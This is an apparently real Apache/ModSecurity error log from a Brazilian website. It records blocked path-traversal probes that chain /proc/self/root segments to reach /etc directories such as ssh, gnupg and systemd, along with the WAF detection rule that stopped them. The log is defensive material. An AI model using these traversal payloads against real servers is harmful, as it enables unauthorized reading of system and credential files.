[Mon Mar 16 11:30:07.079780 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.243.203:39434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT75qj1wV0Si-OkefkHgAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:08.397556 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:39444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT8Jqj1wV0Si-OkefkJAAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:09.742993 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:39454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT8bABkC4fWIHEf8HjewAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:11.051081 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.243.203:52120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT85qj1wV0Si-OkefkKgAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:13.326319 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.243.203:52124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT9dSswJuvopo3lOhYCwAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:14.613388 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:52130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT9o6lpbStxTqkSktlmwAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:15.972461 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:52146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT99SswJuvopo3lOhYDAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:17.387146 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:52150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT-f9ocpUE4ed4uDznjAAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:19.743167 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:52156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT-wlT9VtDQc7bgUynEQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:19.783755 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:34930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT-5qj1wV0Si-OkefkMwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:21.028510 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:42590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT_XjZBu2q05ozVU9O0gAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:21.119614 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:39982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgT_bABkC4fWIHEf8HjfQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:29.115241 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:42602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUBRXjF1vJNtV6CWrv8AAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:30.430581 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:54682] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUBtSswJuvopo3lOhYDQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:33.963914 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:54684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUCZqj1wV0Si-OkefkNwAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:41.753067 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:54694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUEXjZBu2q05ozVU9O6wAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:42.798380 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.241.46:39988] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUEnjZBu2q05ozVU9O7QAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:44.222541 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:33402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUFLABkC4fWIHEf8HjgAAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:30:55.217488 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:36472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUH7ysWC90G-1nBrA9HQAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:30:57.252394 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.241.46:33416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUIXbQATo66fKoS7xGWAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:31:00.625136 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.241.46:44676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUJJqj1wV0Si-OkefkQQAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:31:01.023325 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.243.203:46974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgUJQlT9VtDQc7bgUynJgAAAQo"], referer: 